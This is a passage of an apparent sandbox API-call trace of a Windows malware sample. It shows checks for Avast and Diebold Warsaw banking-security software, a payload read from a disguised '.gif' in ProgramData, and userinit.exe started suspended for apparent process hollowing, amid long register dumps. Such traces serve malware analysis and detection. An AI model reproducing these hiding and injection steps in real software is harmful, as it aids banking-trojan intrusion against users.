[75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd8000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x24fc90, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0106.991] ResumeThread (hThread=0xf8) returned 0x1
[0106.991] VirtualFree (lpAddress=0x9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0106.992] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.992] GlobalUnlock (hMem=0x95000c) returned 0
[0106.992] GlobalHandle (pMem=0x33d8b0) returned 0x950004
[0106.992] GlobalUnlock (hMem=0x950004) returned 0
[0106.999] Sleep (dwMilliseconds=0xe74e)
[0117.009] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0117.009] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0117.009] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0117.009] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0117.009] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100
[0117.009] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e678*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e678*=0) returned 0x0
[0117.009] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0117.010] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x5e000
[0117.010] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0117.011] GlobalLock (hMem=0x950004) returned 0x33d8b0
[0117.011] ReadFile (in: hFile=0x100, lpBuffer=0x33d8b0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0x12e68c, lpOverlapped=0x0 | out: lpBuffer=0x33d8b0*, lpNumberOfBytesRead=0x12e68c*=0x5e000, lpOverlapped=0x0) returned 1
[0117.017] CloseHandle (hObject=0x100) returned 1
[0117.017] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.018] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.018] GlobalUnlock (hMem=0x95000c) returned 0
[0117.018] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4000, uFlags=0x2) returned 0x95000c
[0117.018] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.019] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.019] GlobalUnlock (hMem=0x95000c) returned 0
[0117.019] GlobalReAlloc (hMem=0x95000c, dwBytes=0x6000, uFlags=0x2) returned 0x95000c
[0117.020] GlobalLock (hMem=0x95000c) returned 0x39f8d0
[0117.020] GlobalHandle (pMem=0x39f8d0) returned 0x95000c
[0117.020] GlobalUnlock (hMem=0x95000c) returned 0
[0117.020] GlobalReAlloc (hMem=0x95000c, dwBytes=0x8000, uFlags=0x2) returned 0x95000c
[0117.021] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0117.022] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0117.022] GlobalUnlock (hMem=0x95000c) returned 0
[0117.022] GlobalReAlloc (hMem=0x95000c, dwBytes=0xa000, uFlags=0x2) returned 0x95000c
[0117.022] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0117.022] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0117.022] GlobalUnlock (hMem=0x95000c) returned 0
[0117.022] GlobalReAlloc (hMem=0x95000c, dwBytes=0xc000, uFlags=0x2) returned 0x95000c
[0117.023] GlobalLock (hMem=0x95000c) returned 0x3af8f0
[0117.024] GlobalHandle (pMem=0x3af8f0) returned 0x95000c
[0117.024] GlobalUnlock (hMem=0x95000c) returned 0
[0117.024] GlobalReAlloc (hMem=0x95000c, dwBytes=0xe000, uFlags=0x2) returned 0x95000c
[0117.025] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.026] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.026] GlobalUnlock (hMem=0x95000c) returned 0
[0117.026] GlobalReAlloc (hMem=0x95000c, dwBytes=0x10000, uFlags=0x2) returned 0x95000c
[0117.026] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.027] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.027] GlobalUnlock (hMem=0x95000c) returned 0
[0117.027] GlobalReAlloc (hMem=0x95000c, dwBytes=0x12000, uFlags=0x2) returned 0x95000c
[0117.027] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.028] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.028] GlobalUnlock (hMem=0x95000c) returned 0
[0117.028] GlobalReAlloc (hMem=0x95000c, dwBytes=0x14000, uFlags=0x2) returned 0x95000c
[0117.028] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.029] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.029] GlobalUnlock (hMem=0x95000c) returned 0
[0117.029] GlobalReAlloc (hMem=0x95000c, dwBytes=0x16000, uFlags=0x2) returned 0x95000c
[0117.029] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.030] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.030] GlobalUnlock (hMem=0x95000c) returned 0
[0117.030] GlobalReAlloc (hMem=0x95000c, dwBytes=0x18000, uFlags=0x2) returned 0x95000c
[0117.030] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.031] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.031] GlobalUnlock (hMem=0x95000c) returned 0
[0117.031] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1a000, uFlags=0x2) returned 0x95000c
[0117.031] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.032] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.032] GlobalUnlock (hMem=0x95000c) returned 0
[0117.032] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1c000, uFlags=0x2) returned 0x95000c
[0117.032] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.033] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.033] GlobalUnlock (hMem=0x95000c) returned 0
[0117.033] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1e000, uFlags=0x2) returned 0x95000c
[0117.033] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.033] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.033] GlobalUnlock (hMem=0x95000c) returned 0
[0117.034] GlobalReAlloc (hMem=0x95000c, dwBytes=0x20000, uFlags=0x2) returned 0x95000c
[0117.034] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.034] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.034] GlobalUnlock (hMem=0x95000c) returned 0
[0117.034] GlobalReAlloc (hMem=0x95000c, dwBytes=0x22000, uFlags=0x2) returned 0x95000c
[0117.036] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0117.036] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0117.036] GlobalUnlock (hMem=0x95000c) returned 0
[0117.036] GlobalReAlloc (hMem=0x95000c, dwBytes=0x24000, uFlags=0x2) returned 0x95000c
[0117.036] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0117.037] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0117.037] GlobalUnlock (hMem=0x95000c) returned 0
[0117.037] GlobalReAlloc (hMem=0x95000c, dwBytes=0x26000, uFlags=0x2) returned 0x95000c
[0117.039] GlobalLock (hMem=0x95000c) returned 0x3df8e0
[0117.040] GlobalHandle (pMem=0x3df8e0) returned 0x95000c
[0117.040] GlobalUnlock (hMem=0x95000c) returned 0
[0117.040] GlobalReAlloc (hMem=0x95000c, dwBytes=0x28000, uFlags=0x2) returned 0x95000c
[0117.040] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.041] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.041] GlobalUnlock (hMem=0x95000c) returned 0
[0117.041] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2a000, uFlags=0x2) returned 0x95000c
[0117.041] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.041] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.041] GlobalUnlock (hMem=0x95000c) returned 0
[0117.041] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2c000, uFlags=0x2) returned 0x95000c
[0117.041] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.042] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.042] GlobalUnlock (hMem=0x95000c) returned 0
[0117.042] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2e000, uFlags=0x2) returned 0x95000c
[0117.042] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.043] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.043] GlobalUnlock (hMem=0x95000c) returned 0
[0117.043] GlobalReAlloc (hMem=0x95000c, dwBytes=0x30000, uFlags=0x2) returned 0x95000c
[0117.043] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.044] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.044] GlobalUnlock (hMem=0x95000c) returned 0
[0117.044] GlobalReAlloc (hMem=0x95000c, dwBytes=0x32000, uFlags=0x2) returned 0x95000c
[0117.044] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.044] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.044] GlobalUnlock (hMem=0x95000c) returned 0
[0117.044] GlobalReAlloc (hMem=0x95000c, dwBytes=0x34000, uFlags=0x2) returned 0x95000c
[0117.044] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.045] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.045] GlobalUnlock (hMem=0x95000c) returned 0
[0117.045] GlobalReAlloc (hMem=0x95000c, dwBytes=0x36000, uFlags=0x2) returned 0x95000c
[0117.045] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.046] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.046] GlobalUnlock (hMem=0x95000c) returned 0
[0117.046] GlobalReAlloc (hMem=0x95000c, dwBytes=0x38000, uFlags=0x2) returned 0x95000c
[0117.046] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.046] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.047] GlobalUnlock (hMem=0x95000c) returned 0
[0117.047] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3a000, uFlags=0x2) returned 0x95000c
[0117.047] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.047] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.047] GlobalUnlock (hMem=0x95000c) returned 0
[0117.047] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3c000, uFlags=0x2) returned 0x95000c
[0117.047] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.048] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.048] GlobalUnlock (hMem=0x95000c) returned 0
[0117.048] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3e000, uFlags=0x2) returned 0x95000c
[0117.048] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.049] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.049] GlobalUnlock (hMem=0x95000c) returned 0
[0117.049] GlobalReAlloc (hMem=0x95000c, dwBytes=0x40000, uFlags=0x2) returned 0x95000c
[0117.049] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.049] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.049] GlobalUnlock (hMem=0x95000c) returned 0
[0117.049] GlobalReAlloc (hMem=0x95000c, dwBytes=0x42000, uFlags=0x2) returned 0x95000c
[0117.050] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.050] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.050] GlobalUnlock (hMem=0x95000c) returned 0
[0117.050] GlobalReAlloc (hMem=0x95000c, dwBytes=0x44000, uFlags=0x2) returned 0x95000c
[0117.050] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.051] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.051] GlobalUnlock (hMem=0x95000c) returned 0
[0117.051] GlobalReAlloc (hMem=0x95000c, dwBytes=0x46000, uFlags=0x2) returned 0x95000c
[0117.051] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.052] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.052] GlobalUnlock (hMem=0x95000c) returned 0
[0117.052] GlobalReAlloc (hMem=0x95000c, dwBytes=0x48000, uFlags=0x2) returned 0x95000c
[0117.052] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.052] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.052] GlobalUnlock (hMem=0x95000c) returned 0
[0117.052] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4a000, uFlags=0x2) returned 0x95000c
[0117.053] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.053] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.053] GlobalUnlock (hMem=0x95000c) returned 0
[0117.053] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4c000, uFlags=0x2) returned 0x95000c
[0117.053] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.054] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.054] GlobalUnlock (hMem=0x95000c) returned 0
[0117.054] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4e000, uFlags=0x2) returned 0x95000c
[0117.054] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.055] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.055] GlobalUnlock (hMem=0x95000c) returned 0
[0117.055] GlobalReAlloc (hMem=0x95000c, dwBytes=0x50000, uFlags=0x2) returned 0x95000c
[0117.055] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.055] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.055] GlobalUnlock (hMem=0x95000c) returned 0
[0117.056] GlobalReAlloc (hMem=0x95000c, dwBytes=0x52000, uFlags=0x2) returned 0x95000c
[0117.056] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.057] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.057] GlobalUnlock (hMem=0x95000c) returned 0
[0117.057] GlobalReAlloc (hMem=0x95000c, dwBytes=0x54000, uFlags=0x2) returned 0x95000c
[0117.057] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.057] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.057] GlobalUnlock (hMem=0x95000c) returned 0
[0117.057] GlobalReAlloc (hMem=0x95000c, dwBytes=0x56000, uFlags=0x2) returned 0x95000c
[0117.057] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.058] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.058] GlobalUnlock (hMem=0x95000c) returned 0
[0117.058] GlobalReAlloc (hMem=0x95000c, dwBytes=0x58000, uFlags=0x2) returned 0x95000c
[0117.058] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.059] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.059] GlobalUnlock (hMem=0x95000c) returned 0
[0117.059] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5a000, uFlags=0x2) returned 0x95000c
[0117.059] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.060] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.060] GlobalUnlock (hMem=0x95000c) returned 0
[0117.060] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5c000, uFlags=0x2) returned 0x95000c
[0117.060] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.060] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.060] GlobalUnlock (hMem=0x95000c) returned 0
[0117.060] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5e000, uFlags=0x2) returned 0x95000c
[0117.060] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0117.061] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x580c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x580c10 | out: lpCommandLine="", lpProcessInformation=0x580c10*(hProcess=0xfc, hThread=0x100, dwProcessId=0xfc8, dwThreadId=0xfcc)) returned 1
[0117.064] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x9d0000
[0117.064] GetThreadContext (in: hThread=0x100, lpContext=0x9d0000 | out: lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd6000, Edx=0x0, Ecx=0x0, Eax=0x4b2be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x1af9c0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, 